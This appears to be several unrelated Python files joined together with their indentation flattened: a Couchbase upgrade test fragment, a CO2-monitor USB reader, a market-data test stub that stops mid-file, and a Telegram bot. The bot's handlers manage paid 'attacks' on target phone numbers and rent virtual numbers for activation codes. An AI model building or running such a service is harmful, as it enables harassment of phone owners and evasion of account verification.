tasks = []
for i in range(100):
mid_upgrade_tasks = self.async_run_operations(phase="in_between")
tasks.append(mid_upgrade_tasks)
self.sleep(10)
return tasks
def _create_plasma_buckets(self):
self.add_built_in_server_user()
for bucket in self.buckets:
if bucket.name.startswith("standard"):
BucketOperationHelper.delete_bucket_or_assert(
serverInfo=self.master, bucket=bucket.name)
self.buckets = [bu for bu in self.buckets if not bu.name.startswith("standard")]
buckets = []
for i in range(self.num_plasma_buckets):
name = "plasma_bucket_" + str(i)
buckets.append(name)
bucket_size = self._get_bucket_size(self.quota,
len(self.buckets)+len(buckets))
self._create_buckets(server=self.master, bucket_list=buckets,
bucket_size=bucket_size)
testuser = []
rolelist = []
for bucket in buckets:
testuser.append({'id': bucket, 'name': bucket, 'password': 'password'})
rolelist.append({'id': bucket, 'name': bucket, 'roles': 'admin'})
self.add_built_in_server_user(testuser=testuser, rolelist=rolelist)
buckets = []
for bucket in self.buckets:
if bucket.name.startswith("plasma_bucket"):
buckets.append(bucket)
return buckets
def _verify_gsi_rebalance(self):
node_map = self._get_nodes_with_version()
for node, vals in node_map.items():
if vals["version"] < "5":
return
self.rest = RestConnection(self.master)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index")
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [nodes_out_list])
reached = RestHelper(self.rest).rebalance_reached()
rebalance.result()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
self.n1ql_helper.verify_indexes_redistributed(
map_before_rebalance, map_after_rebalance, stats_map_before_rebalance,
stats_map_after_rebalance, [], [nodes_out_list])
# Add back the node that was removed, and use alter index to move an index to that node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[nodes_out_list], [], services=["kv,index,n1ql"])
reached = RestHelper(self.rest).rebalance_reached()
rebalance.result()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
self._verify_alter_index()
self.sleep(120)
def _verify_alter_index(self):
index_nodes = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
rest = RestConnection(self.master)
index_map = rest.get_index_status()
log.info("index_map: {0}".format(index_map))
index_info = index_map[self.buckets[0].name]
for index_name, index_vals in index_info.items():
host = index_vals["hosts"]
for index_node in index_nodes:
ip_str = index_node.ip + ":" + index_node.port
if host != ip_str:
alter_index_query = "ALTER INDEX {0}.{1} with {{'action':'move','nodes':['{2}:{3}']}}".format(
self.buckets[0].name, index_name, index_node.ip, index_node.port)
result = self.n1ql_helper.run_cbq_query(query=alter_index_query, server=self.n1ql_node)
self.assertEqual(result['status'], 'success', 'Query was not run successfully')
return
def _verify_index_partitioning(self):
node_map = self._get_nodes_with_version()
for node, vals in node_map.items():
if vals["version"] < "5.5":
return
indexer_node = self.get_nodes_from_services_map(service_type="index")
# Set indexer storage mode
rest = RestConnection(indexer_node)
rest.set_index_settings({"indexer.numPartitions": 2})
queries = []
for bucket in self.buckets:
create_partitioned_index1_query = f"CREATE INDEX partitioned_idx1 ON {bucket.name}(name, age, join_yr) " \
f"partition by hash(name, age, join_yr) USING GSI;"
create_index1_query = f"CREATE INDEX non_partitioned_idx1 ON {bucket.name}(name, age, join_yr) USING GSI;"
try:
self.n1ql_helper.run_cbq_query(query=create_partitioned_index1_query, server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index1_query, server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
# Scans
# 1. Small lookup query with equality predicate on the partition key
query_details = {"query": f"select name, age, join_yr from {bucket.name} USE INDEX" +
" ({0}) where name='Kala'",
"partitioned_idx_name": "partitioned_idx1",
"non_partitioned_idx_name": "non_partitioned_idx1"}
queries.append(query_details)
# 2. Pagination query with equality predicate on the partition key
query_details = {
"query": f"select name, age, join_yr from {bucket.name} USE INDEX" +
" ({0}) where name is not missing AND age=50 offset 0 limit 10",
"partitioned_idx_name": "partitioned_idx1", "non_partitioned_idx_name": "non_partitioned_idx1"}
queries.append(query_details)
# 3. Large aggregated query
query_details = {
"query": f"select count(name), age from {bucket.name} USE INDEX" +
" ({0}) where name is not missing group by age",
"partitioned_idx_name": "partitioned_idx1", "non_partitioned_idx_name": "non_partitioned_idx1"}
queries.append(query_details)
# 4. Scan with large result sets
query_details = {
"query": f"select name, age, join_yr from {bucket.name} USE INDEX" +
" ({0}) where name is not missing AND age > 50",
"partitioned_idx_name": "partitioned_idx1", "non_partitioned_idx_name": "non_partitioned_idx1"}
queries.append(query_details)
failed_queries = []
for query_details in queries:
try:
query_partitioned_index = query_details["query"].format(query_details["partitioned_idx_name"])
query_non_partitioned_index = query_details["query"].format(query_details["non_partitioned_idx_name"])
result_partitioned_index = self.n1ql_helper.run_cbq_query(query=query_partitioned_index,
server=self.n1ql_node)["results"]
result_non_partitioned_index = self.n1ql_helper.run_cbq_query(query=query_non_partitioned_index,
server=self.n1ql_node)["results"]
if sorted(result_partitioned_index) != sorted(result_non_partitioned_index):
failed_queries.append(query_partitioned_index)
log.warning("*** This query does not return same results for partitioned and non-partitioned "
"indexes.")
except Exception as ex:
log.info(str(ex))
msg = "Some scans did not yield the same results for partitioned index and non-partitioned indexes"
self.assertEqual(len(failed_queries), 0, msg)
def _return_maps(self):
index_map = self.get_index_map()
stats_map = self.get_index_stats(perNode=False)
return index_map, stats_map
def disable_upgrade_to_plasma(self, indexer_node):
rest = RestConnection(indexer_node)
doc = {"indexer.settings.storage_mode.disable_upgrade": self.disable_plasma_upgrade}
rest.set_index_settings(doc)
self.sleep(10)
remote = RemoteMachineShellConnection(indexer_node)
remote.stop_server()
self.sleep(30)
remote.start_server()
self.sleep(30)
def set_batch_size(self, indexer_node, batch_size=5):
rest = RestConnection(indexer_node)
doc = {"indexer.settings.build.batch_size": batch_size}
rest.set_index_settings(doc)
self.sleep(10)
remote = RemoteMachineShellConnection(indexer_node)
remote.stop_server()
self.sleep(30)
remote.start_server()
self.sleep(30)
def get_batch_size(self, indexer_node):
rest = RestConnection(indexer_node)
json_settings = rest.get_index_settings()
return json_settings["indexer.settings.build.batch_size"]
def _verify_indexer_storage_mode(self, indexer_node):
indexer_info = "{0}:8091".format(indexer_node.ip)
rest = RestConnection(indexer_node)
index_metadata = rest.get_indexer_metadata()["status"]
node_map = self._get_nodes_with_version()
for node in node_map.keys():
if node == indexer_node.ip:
if node_map[node]["version"] < "5" or \
self.gsi_type == "memory_optimized":
return
else:
if self.disable_plasma_upgrade:
gsi_type = "forestdb"
else:
gsi_type = "plasma"
for index_val in index_metadata:
if index_val["hosts"] == indexer_info:
self.assertEqual(index_val["indexType"], gsi_type,
"GSI type is not {0} after upgrade for index {1}".format(gsi_type, index_val["name"]))
def _verify_throttling(self, indexer_node):
indexer_info = "{0}:8091".format(indexer_node.ip)
rest = RestConnection(indexer_node)
index_metadata = rest.get_indexer_metadata()["status"]
index_building = 0
index_created = 0
for index_val in index_metadata:
if index_val["hosts"] == indexer_info:
index_building = index_building + (index_val["status"].lower() == "building")
index_created = index_created + (index_val["status"].lower() == "created")
batch_size = self.get_batch_size(indexer_node)
self.assertGreaterEqual(batch_size, -1, "Batch size is less than -1. Failing")
if batch_size == -1:
self.assertEqual(index_created, 0, "{0} indexes are in created state when batch size is -1".format(index_created))
return
if batch_size == 0:
            self.assertEqual(index_building, 0, "{0} indexes are in building state when batch size is 0".format(index_building))
return
if batch_size > 0:
self.assertLessEqual(index_building, batch_size, "{0} indexes are in building when batch size is {1}".format(index_building, batch_size))
return
|
co2meter.py
|
""" Class for reading data from CO2 monitor.
(c) Vladimir Filimonov, 2016-2018
E-mail: vladimir.a.filimonov@gmail.com
"""
try:
import hid
except AttributeError as e:
    if 'windll' in str(e):
        raise ImportError('Import failed with an error "AttributeError: %s". '
                          'Possibly there\'s a name conflict. Please check if '
                          'library "hid" is installed and if so - uninstall it, '
                          'keeping only "hidapi".' % str(e))
else:
raise
import datetime as dt
from contextlib import contextmanager
import threading
import time
import os
plt = None # To be imported on demand only
try:
import pandas as pd
except ImportError:
pd = None
_CO2MON_HID_VENDOR_ID = 0x04d9
_CO2MON_HID_PRODUCT_ID = 0xa052
_CO2MON_MAGIC_WORD = b'Htemp99e'
_CO2MON_MAGIC_TABLE = (0, 0, 0, 0, 0, 0, 0, 0)
_CODE_END_MESSAGE = 0x0D
_CODE_CO2 = 0x50
_CODE_TEMPERATURE = 0x42
_COLORS = {'r': (0.86, 0.37, 0.34),
'g': (0.56, 0.86, 0.34),
'b': 'b'}
CO2_HIGH = 1200
CO2_LOW = 800
#############################################################################
def now():
return dt.datetime.now().replace(microsecond=0)
#############################################################################
def list_to_longint(x):
return sum([val << (i * 8) for i, val in enumerate(x[::-1])])
#############################################################################
def longint_to_list(x):
return [(x >> i) & 0xFF for i in (56, 48, 40, 32, 24, 16, 8, 0)]
#############################################################################
def convert_temperature(val):
""" Convert temperature from Kelvin (unit of 1/16th K) to Celsius
"""
return val * 0.0625 - 273.15
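# Worked example: a raw reading of 4726 corresponds to 4726 / 16 = 295.375 K,
# i.e. 295.375 - 273.15 = 22.225 degrees Celsius.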
#############################################################################
# Class to operate with CO2 monitor
#############################################################################
class CO2monitor:
def __init__(self, bypass_decrypt=False):
""" Initialize the CO2monitor object and retrieve basic HID info.
Args:
bypass_decrypt (bool): For certain CO2 meter models packages that
are sent over USB are not encrypted. In this case instance
of CO2monitor will return no data in .read_data().
If this happens, setting bypass_decrypt to True might
solve the issue.
See also:
https://github.com/vfilimonov/co2meter/issues/16
"""
self.bypass_decrypt = bypass_decrypt
self._info = {'vendor_id': _CO2MON_HID_VENDOR_ID,
'product_id': _CO2MON_HID_PRODUCT_ID}
self._h = hid.device()
# Number of requests to open connection
self._status = 0
self._magic_word = [((w << 4) & 0xFF) | (w >> 4)
for w in bytearray(_CO2MON_MAGIC_WORD)]
self._magic_table = _CO2MON_MAGIC_TABLE
self._magic_table_int = list_to_longint(_CO2MON_MAGIC_TABLE)
# Initialisation of continuous monitoring
if pd is None:
self._data = []
else:
self._data = pd.DataFrame()
self._keep_monitoring = False
self._interval = 10
# Device info
with self.co2hid():
self._info['manufacturer'] = self._h.get_manufacturer_string()
self._info['product_name'] = self._h.get_product_string()
self._info['serial_no'] = self._h.get_serial_number_string()
#########################################################################
def hid_open(self, send_magic_table=True):
""" Open connection to HID device. If connection is already open,
then only the counter of requests is incremented (so hid_close()
knows how many sub-processes keep the HID handle)
Parameters
----------
send_magic_table : bool
If True then the internal "magic table" will be sent to
the device (it is used for decryption)
"""
if self._status == 0:
# If connection was not opened before
self._h.open(self._info['vendor_id'], self._info['product_id'])
if send_magic_table:
self._h.send_feature_report(self._magic_table)
self._status += 1
def hid_close(self, force=False):
""" Close connection to HID device. If there were several hid_open()
attempts then the connection will be closed only after respective
number of calls to hid_close() method
Parameters
----------
force : bool
Force-close of connection irrespectively of the counter of
open requests
"""
if force:
self._status = 0
elif self._status > 0:
self._status -= 1
if self._status == 0:
self._h.close()
def hid_read(self):
""" Read 8-byte string from HID device """
msg = self._h.read(8)
return self._decrypt(msg)
@contextmanager
def co2hid(self, send_magic_table=True):
self.hid_open(send_magic_table=send_magic_table)
try:
yield
finally:
self.hid_close()
#########################################################################
@property
def info(self):
""" Device info """
return self._info
@property
def is_alive(self):
""" If the device is still connected """
try:
with self.co2hid(send_magic_table=True):
return True
except:
return False
#########################################################################
def _decrypt(self, message):
""" Decode message received from CO2 monitor.
"""
if self.bypass_decrypt:
return message
# Rearrange message and convert to long int
msg = list_to_longint([message[i] for i in [2, 4, 0, 7, 1, 6, 5, 3]])
# XOR with magic_table
res = msg ^ self._magic_table_int
# Cyclic shift by 3 to the right
res = (res >> 3) | ((res << 61) & 0xFFFFFFFFFFFFFFFF)
# Convert to list
res = longint_to_list(res)
# Subtract and convert to uint8
res = [(r - mw) & 0xFF for r, mw in zip(res, self._magic_word)]
return res
@staticmethod
def decode_message(msg):
""" Decode value from the decrypted message
Parameters
----------
msg : list
Decrypted message retrieved with hid_read() method
Returns
-------
CntR : int
CO2 concentration in ppm
Tamb : float
Temperature in Celsius
"""
# Expected 3 zeros at the end
bad_msg = (msg[5] != 0) or (msg[6] != 0) or (msg[7] != 0)
# End of message should be 0x0D
bad_msg |= msg[4] != _CODE_END_MESSAGE
# Check sum: LSB of sum of first 3 bytes
bad_msg |= (sum(msg[:3]) & 0xFF) != msg[3]
if bad_msg:
return None, None
value = (msg[1] << 8) | msg[2]
if msg[0] == _CODE_CO2: # CO2 concentration in ppm
return int(value), None
elif msg[0] == _CODE_TEMPERATURE: # Temperature in Celsius
return None, convert_temperature(value)
else: # Other codes - so far not decoded
return None, None
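    # Worked example (an illustrative message, not taken from a real capture):
    # the decrypted message [0x50, 0x04, 0xD8, 0x2C, 0x0D, 0, 0, 0] has code 0x50
    # (_CODE_CO2), value (0x04 << 8) | 0xD8 = 1240 and checksum
    # (0x50 + 0x04 + 0xD8) & 0xFF = 0x2C, so decode_message() returns (1240, None),
    # i.e. 1240 ppm CO2 and no temperature reading.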
def _read_co2_temp(self, max_requests=50):
""" Read one pair of values from the device.
        The HID device should already be open.
"""
co2, temp = None, None
for ii in range(max_requests):
_co2, _temp = self.decode_message(self.hid_read())
if _co2 is not None:
co2 = _co2
if _temp is not None:
temp = _temp
if (co2 is not None) and (temp is not None):
break
return now(), co2, temp
#########################################################################
def read_data_raw(self, max_requests=50):
with self.co2hid(send_magic_table=True):
vals = self._read_co2_temp(max_requests=max_requests)
self._last_data = vals
return vals
def read_data(self, max_requests=50):
""" Listen to values from device and retrieve temperature and CO2.
Parameters
----------
max_requests : int
Effective timeout: number of attempts after which None is returned
Returns
-------
tuple (timestamp, co2, temperature)
or
pandas.DataFrame indexed with timestamp
Results of measurements
"""
if self._keep_monitoring:
if pd is None:
return self._data[-1]
else:
return self._data.iloc[[-1]]
else:
vals = self.read_data_raw(max_requests=max_requests)
# If pandas is available - return pandas.DataFrame
if pd is not None:
vals = pd.DataFrame({'co2': vals[1], 'temp': vals[2]},
index=[vals[0]])
return vals
#########################################################################
def _monitoring(self):
""" Private function for continuous monitoring.
"""
with self.co2hid(send_magic_table=True):
while self._keep_monitoring:
vals = self._read_co2_temp(max_requests=1000)
if pd is None:
self._data.append(vals)
else:
vals = pd.DataFrame({'co2': vals[1], 'temp': vals[2]},
index=[vals[0]])
self._data = self._data.append(vals)
time.sleep(self._interval)
def start_monitoring(self, interval=5):
""" Start continuous monitoring of the values and collecting them
in the list / pandas.DataFrame.
The monitoring is started in a separate thread, so the current
interpreter session is not blocked.
Parameters
----------
interval : float
Interval in seconds between consecutive data reads
"""
self._interval = interval
if self._keep_monitoring:
# If already started then we should not start a new thread
return
self._keep_monitoring = True
t = threading.Thread(target=self._monitoring)
t.start()
def stop_monitoring(self):
""" Stop continuous monitoring
"""
self._keep_monitoring = False
#########################################################################
@property
def data(self):
""" All data retrieved with continuous monitoring
"""
return self._data
def log_data_to_csv(self, fname):
""" Log data retrieved with continuous monitoring to CSV file. If the
file already exists, then it will be appended.
Note, that the method requires pandas package (so far alternative
is not implemented).
Parameters
----------
fname : string
Filename
"""
if pd is None:
raise NotImplementedError('Logging to CSV is implemented '
'using pandas package only (so far)')
if os.path.isfile(fname):
# Check the last line to get the timestamp of the last record
df = pd.read_csv(fname)
last = pd.Timestamp(df.iloc[-1, 0])
# Append only new data
with open(fname, 'a') as f:
self._data[self._data.index > last].to_csv(f, header=False)
else:
self._data.to_csv(fname)
#############################################################################
def read_csv(fname):
""" Read data from CSV file.
Parameters
----------
fname : string
Filename
"""
if pd is None:
raise NotImplementedError('Reading CSV files is implemented '
'using pandas package only (so far)')
    return pd.read_csv(fname, index_col=0, parse_dates=True)
#############################################################################
def plot(data, plot_temp=False, ewma_halflife=30., **kwargs):
""" Plot recorded data
Parameters
----------
data : pandas.DataFrame
Data indexed by timestamps. Should have columns 'co2' and 'temp'
plot_temp : bool
If True temperature will be also plotted
ewma_halflife : float
If specified (not None) data will be smoothed using EWMA
"""
global plt
if plt is None:
import matplotlib.pyplot as _plt
plt = _plt
if pd is None:
raise NotImplementedError('Plotting is implemented so far '
'using pandas package only')
# DataFrames
if (ewma_halflife is not None) and (ewma_halflife > 0):
halflife = pd.Timedelta(ewma_halflife, 's') / pd.np.mean(pd.np.diff(data.index))
co2 = pd.ewma(data.co2, halflife=halflife, min_periods=0)
temp = pd.ewma(data.temp, halflife=2 * halflife, min_periods=0)
else:
co2 = data.co2
temp = data.temp
co2_r = co2.copy()
co2_g = co2.copy()
co2_r[co2_r <= CO2_HIGH] = pd.np.NaN
co2_g[co2_g >= CO2_LOW] = pd.np.NaN
# Plotting
ax = kwargs.pop('ax', plt.gca())
ax.fill_between(co2_r.index, co2_r.values, CO2_HIGH,
alpha=0.5, color=_COLORS['r'])
ax.fill_between(co2_g.index, co2_g.values, CO2_LOW,
alpha=0.5, color=_COLORS['g'])
ax.axhline(CO2_LOW, color=_COLORS['g'], lw=2, ls='--')
ax.axhline(CO2_HIGH, color=_COLORS['r'], lw=2, ls='--')
ax.plot(co2.index, co2.values, lw=2, color='k')
yl = ax.get_ylim()
ax.set_ylim([min(600, yl[0]), max(1400, yl[1])])
ax.set_ylabel('CO2 concentration, ppm')
plt.setp(ax.xaxis.get_majorticklabels(), rotation=0,
horizontalalignment='center')
if plot_temp:
ax2 = ax.twinx()
ax2.plot(temp.index, temp.values, color=_COLORS['b'])
ax2.set_ylabel('Temperature, C')
yl = ax2.get_ylim()
ax2.set_ylim([min(19, yl[0]), max(23, yl[1])])
ax2.grid('off')
plt.tight_layout()
#############################################################################
# Entry points
#############################################################################
def start_server():
from .server import start_server as start
start()
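# A minimal usage sketch (assumes a supported CO2 monitor is plugged in;
# the variable names below are illustrative only):
#
#     mon = CO2monitor()
#     print(mon.info)                     # HID vendor/product/serial details
#     print(mon.read_data())              # one (timestamp, co2, temp) reading
#     mon.start_monitoring(interval=10)   # collect readings in a background thread
#     ...
#     mon.stop_monitoring()
#     mon.log_data_to_csv('co2_log.csv')  # requires pandas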
|
queries.py
|
import threading
from typing import Any
import pandas as pd
from io import BytesIO
from asyncio import sleep
from datetime import timedelta
from aiohttp import ClientSession
from datetime import datetime as dt
from qiwipyapi import Wallet
from aiogram.dispatcher.storage import FSMContext
from aiogram.types import (CallbackQuery, InlineKeyboardMarkup,
InlineKeyboardButton, ReplyKeyboardMarkup,
Message)
from objects import globals
from formats import dateTime
from db_models.FAO import FAO
from states.states import States
from db_models.UserAuth import UserAuth
from db_models.UserData import UserData
from temp.select_lang import select_lang
from objects.globals import dp, bot, config
from temp.lang_keyboards import lang_keyboard
WALLET: Wallet = Wallet(
globals.config["qiwi_phone"], p2p_sec_key=globals.config["qiwi_private_key"])
@dp.callback_query_handler(lambda query: query.data.startswith(("language")))
async def select_language(query: CallbackQuery):
""" Select language
:param: query
:type: CallbackQuery
:return: Bot message
:rtype: Message
"""
change_language: UserAuth = await UserAuth.objects.get(login=query.from_user.id)
await change_language.update(language=query.data.split("_")[1])
await bot.delete_message(chat_id=query.from_user.id, message_id=query.message.message_id,)
return await bot.send_message(chat_id=query.from_user.id,
text=select_lang[query.data.split("_")[1]],
reply_markup=ReplyKeyboardMarkup(resize_keyboard=True, keyboard=lang_keyboard[query.data.split("_")[1]]))
@dp.callback_query_handler(lambda query: query.data == "change_language")
async def change_language(query: CallbackQuery):
""" Change language
:param: query
:type: CallbackQuery
:return: Bot edit message
:rtype: Message
"""
languages_markup: InlineKeyboardMarkup = InlineKeyboardMarkup(
inline_keyboard=[
[InlineKeyboardButton(text="🇬🇧ENG", callback_data="language_ENG")],
[InlineKeyboardButton(text="🇷🇺RU", callback_data="language_RU")]
])
await bot.edit_message_text(chat_id=query.from_user.id, message_id=query.message.message_id,
text="🌐Select the language", reply_markup=languages_markup)
@dp.callback_query_handler(lambda query: query.data == "stoped_attack")
async def stoped_attack(query: CallbackQuery):
""" Stoped attack
:param: query
:type: CallbackQuery
:return: Bot edit message
:rtype: Message
"""
await globals.client_session_object.stop()
#thread = threading.Thread(target=globals.client_session_object.stop, args=())
#await thread.start()
main_user_data: UserAuth = await UserAuth.objects.get(login=query.from_user.id)
if main_user_data == "RU":
text: str = "✅Атака остановлена"
else:
text: str = "✅Attack stopped"
await bot.edit_message_text(chat_id=query.from_user.id, message_id=query.message.message_id,
text=text)
@dp.callback_query_handler(lambda query: query.data == "info_about_the_last_attack")
async def get_info_about_the_last_attack(query: CallbackQuery):
""" Get info about the last attack
:param: query
:type: CallbackQuery
:return: Bot edit message
:rtype: Message
"""
main_user_data: UserAuth = await UserAuth.objects.get(login=query.from_user.id)
user_data: UserData = await UserData.objects.filter(user_id=query.from_user.id).all()
if not user_data:
if main_user_data.language == "RU":
have_not_attack_text: str = "Вы еще не совершали атаку!"
else:
have_not_attack_text: str = "You haven't made an attack yet"
return await bot.edit_message_text(chat_id=query.from_user.id, message_id=query.message.message_id,
text=have_not_attack_text)
user_data = user_data[0]
if main_user_data.language == "RU":
unknow_msg: str = "Неизвестно"
else:
unknow_msg: str = "Unknow"
phone: Any = user_data.last_phone if user_data.last_phone != None else unknow_msg
date: Any = dateTime.datetime_format(
user_data.last_created) if user_data.last_created != None else unknow_msg
return await bot.edit_message_text(chat_id=query.from_user.id, message_id=query.message.message_id,
text=f"📄Информация о последней атаке ➜\n\n"
f"💎Статус: {user_data.status} кругов\n"
f"〰️\n"
f"☎️Номер телефона: {phone}\n"
f"〰️\n"
f"📅Дата и время: {date}")
@dp.callback_query_handler(lambda query: query.data == "top_up_balance")
async def top_up_balance(query: CallbackQuery):
""" Set the amount to top up ()
:param: query
:type: CallbackQuery
:return: Bot edit message
:rtype: Message
"""
main_user_data: UserAuth = await UserAuth.objects.get(login=query.from_user.id)
if main_user_data.language == "RU":
        top_up_text: str = "Введите сумму для пополнения:"
else:
top_up_text: str = "Enter the amount to top up:"
await bot.edit_message_text(chat_id=query.from_user.id, message_id=query.message.message_id,
text=top_up_text)
await States.get_amount_balance_targ.set()
@dp.message_handler(state=States.get_amount_balance_targ)
async def get_amount_balance(message: Message, state: FSMContext):
""" Get the amount to top up
:param: message
:type: Message
:param: state
:type: FSMContext
:return: Bot edit message
:rtype: Message
"""
await state.finish()
try:
amount: float = float(message.text)
invoice = WALLET.create_invoice(
value=amount, expirationDateTime=dateTime.datetime_format(dt.now()+timedelta(hours=3)))
main_user_data: UserAuth = await UserAuth.objects.get(login=message.from_user.id)
if main_user_data.language == "RU":
payment_text_button: str = "Продолжить оплату"
payment_text_message: str = "Продолжить оплату?"
successfull_payment: str = "Ваш баланс успешно пополнен на %.2f₽"
correct_input_msg: str = "Правильный формат ввода суммы - 10 или 10.0"
else:
payment_text_button: str = "Continue"
payment_text_message: str = "Continue?"
successfull_payment: str = "Your balance has been successfully credited to %.2f₽"
correct_input_msg: str = "The correct format for entering the amount - 10 or 10.0"
payment_url: InlineKeyboardMarkup = InlineKeyboardMarkup(
inline_keyboard=[
[InlineKeyboardButton(
text=payment_text_button, url=invoice["payUrl"])]
])
await message.answer(text=payment_text_message, reply_markup=payment_url)
while True:
status = WALLET.invoice_status(bill_id=invoice["billId"])
if status["status"]["value"] == "PAID":
update_balance: UserAuth = await UserAuth.objects.get(login=message.from_user.id)
new_value_to_balance: float = float(
update_balance.balance) + amount
await update_balance.update(balance=new_value_to_balance)
return await message.answer(successfull_payment % amount)
await sleep(5)
except ValueError:
return await message.answer(text=correct_input_msg)
@dp.callback_query_handler(lambda query: query.data == "get_history_activations")
async def get_history_activation(query: CallbackQuery):
""" Get history activation
:param: query
:type: CallbackQuery
:return: Bot document
:rtype: Message
"""
main_user_data: UserAuth = await UserAuth.objects.get(login=query.from_user.id)
fao_data: FAO = await FAO.objects.filter(user_id=query.from_user.id).all()
if main_user_data.language == "RU":
wait_loading_text: str = "Дождитесь загрузки..."
columns: list = ["ID", "Дата и время", "Сервис", "Цена"]
else:
wait_loading_text: str = "Wait for loading ..."
columns: list = ["ID", "Date and time", "Service", "Price"]
all_data: list = []
all_data.append([id.id for id in fao_data])
all_data.append([created.created for created in fao_data])
all_data.append([service.service for service in fao_data])
all_data.append([price.price for price in fao_data])
to_write: BytesIO = BytesIO()
data_dict: dict = dict(zip(columns, all_data))
df = pd.DataFrame(data_dict)
df.to_excel(to_write)
await bot.edit_message_text(chat_id=query.from_user.id, message_id=query.message.message_id,
text=wait_loading_text)
return await bot.send_document(query.message.chat.id, document=("activation.xlsx", to_write.getvalue()))
@dp.callback_query_handler(lambda query: query.data.startswith(("num")))
async def pay_number(query: CallbackQuery):
""" Pay number virtual phone
:param: query
:type: CallbackQuery
:return: Bot message or bot edit message
:rtype: Message
"""
metadata_service: list = query.data.split("_")
del metadata_service[0]
service, price = metadata_service
balance: UserAuth = await UserAuth.objects.get(login=query.from_user.id)
host_site_api, api_key = config["host_site_api"], config["api_key"]
if int(balance.balance) < int(price):
return await bot.edit_message_text(chat_id=query.from_user.id, message_id=query.message.message_id,
text="У вас недостаточно средств!")
# Get virtual phone request
async with ClientSession() as client_session:
url_format: str = (f"http://{host_site_api}/stubs/handler_api.php?api_key={api_key}"
f"&action=getNumber&service={service}&operator=any&country=russia")
async with client_session.get(url_format) as resp:
phone = await resp.text()
await client_session.close()
if phone == "NO_NUMBERS":
return await query.answer("Номера отсутствуют!")
elif phone == "NO_BALANCE":
host_site_main: str = config["host_site_main"]
await bot.send_message(config["chat_id"], text=f"Нужно пополнить счет! https://{host_site_main}")
await query.answer(text="Неизвестная ошибка!")
else:
status_phone, id_phone, self_phone = phone.split(":")
cancel_phone: InlineKeyboardMarkup = InlineKeyboardMarkup(
inline_keyboard=[
[InlineKeyboardButton(
text="Отменить", callback_data=f"cancel-num_{id_phone}")]
])
# Found virtual phone page
await bot.edit_message_text(chat_id=query.message.chat.id, message_id=query.message.message_id,
text=f"Status: <b>{status_phone}</b>\n"
f"ID: <code>{id_phone}</code>\n"
f"Number: <code>{self_phone}</code>", reply_markup=cancel_phone)
while True:
# GET ID ORDER request
async with ClientSession() as client_session:
url_format: str = (f"http://{host_site_api}/stubs/handler_api.php?"
f"api_key={api_key}&action=getStatus&id={id_phone}")
async with client_session.get(url_format) as get_id:
get_id = await get_id.text()
if get_id.startswith(("STATUS_OK")):
# UPDATE BALANCE
new_balance: float = float(balance.balance) - float(price)
await balance.update(balance=new_balance)
# CREATE NEW ORDER
await FAO.objects.create(user_id=query.from_user.id, service=service, price=price)
# Code
code: str = get_id.split(":")[1]
# Return code
return await bot.send_message(query.message.chat.id, text=f"Code: <code>{code}</code>")
@dp.callback_query_handler(lambda query: query.data.startswith(("cancel-num")))
async def cancel_number(query: CallbackQuery):
""" Cancel number
:param: query
:type: CallbackQuery
:return: Bot answer message
:rtype: Message
"""
cancel_id_number: str = query.data.replace("_", " ").split()[1]
host_site_api: str = config["host_site_api"]
api_key: str = config["api_key"]
async with ClientSession() as session:
# CANCEL ORDER request
url_format: str = (f"http://{host_site_api}/stubs/handler_api.php?"
f"api_key={api_key}&action=setStatus&status=-1&id={cancel_id_number}")
async with session.post(url_format) as resp:
resp = await resp.text()
if resp == "ACCESS_CANCEL":
await query.answer(text="Номер успешно отменен.")
await bot.delete_message(query.message.chat.id, query.message.message_id)
|
mdtest.py
|
# encoding: UTF-8
import sys,os
from time import sleep
#from qtpy import QtGui
vnpy_root = os.path.abspath(os.path.join(os.path.dirname(__file__),'..','..','..','..','..'))
if vnpy_root not in sys.path:
print(u'append {}'.format(vnpy_root))
sys.path.append(vnpy_root)
from vnpy.api.ctp_se.vnctpmd import MdApi
from threading import Thread
#----------------------------------------------------------------------
def print_dict(d):
"""按照键值打印一个字典"""
for key,value in d.items():
print( key + ':' + str(value))
#----------------------------------------------------------------------
def simple_log(func):
"""简单装饰器用于输出函数名"""
def wrapper(*args, **kw):
print( "")
print( str(func.__name__))
return func(*args, **kw)
return wrapper
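# Illustrative note (added commentary, not part of the original sample): with
# @simple_log applied, every callback first prints a blank line and its own name
# before its body runs, so the console interleaves callback names with the
# dictionaries printed by print_dict.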
########################################################################
class TestMdApi(MdApi):
"""测试用实例"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(TestMdApi, self).__init__()
self.is_connected = False
#----------------------------------------------------------------------
@simple_log
def onFrontConnected(self):
"""服务器连接"""
print('tdtest.py: onFrontConnected')
self.is_connected = True
#----------------------------------------------------------------------
@simple_log
def onFrontDisconnected(self, n):
"""服务器断开"""
print (n)
self.is_connected = False
#----------------------------------------------------------------------
@simple_log
def onHeartBeatWarning(self, n):
"""心跳报警"""
print (n)
#----------------------------------------------------------------------
@simple_log
def onRspError(self, error, n, last):
"""错误"""
print_dict(error)
@simple_log
#----------------------------------------------------------------------
def onRspUserLogin(self, data, error, n, last):
"""登陆回报"""
print_dict(data)
print_dict(error)
print('onRspUserLogin')
#----------------------------------------------------------------------
@simple_log
def onRspUserLogout(self, data, error, n, last):
"""登出回报"""
print_dict(data)
print_dict(error)
#----------------------------------------------------------------------
@simple_log
def onRspSubMarketData(self, data, error, n, last):
"""订阅合约回报"""
print_dict(data)
print_dict(error)
#----------------------------------------------------------------------
@simple_log
def onRspUnSubMarketData(self, data, error, n, last):
"""退订合约回报"""
print_dict(data)
print_dict(error)
#----------------------------------------------------------------------
@simple_log
def onRtnDepthMarketData(self, data):
"""行情推送"""
print_dict(data)
#----------------------------------------------------------------------
@simple_log
def onRspSubForQuoteRsp(self, data, error, n, last):
"""订阅合约回报"""
print_dict(data)
print_dict(error)
#----------------------------------------------------------------------
@simple_log
def onRspUnSubForQuoteRsp(self, data, error, n, last):
"""退订合约回报"""
print_dict(data)
print_dict(error)
#----------------------------------------------------------------------
@simple_log
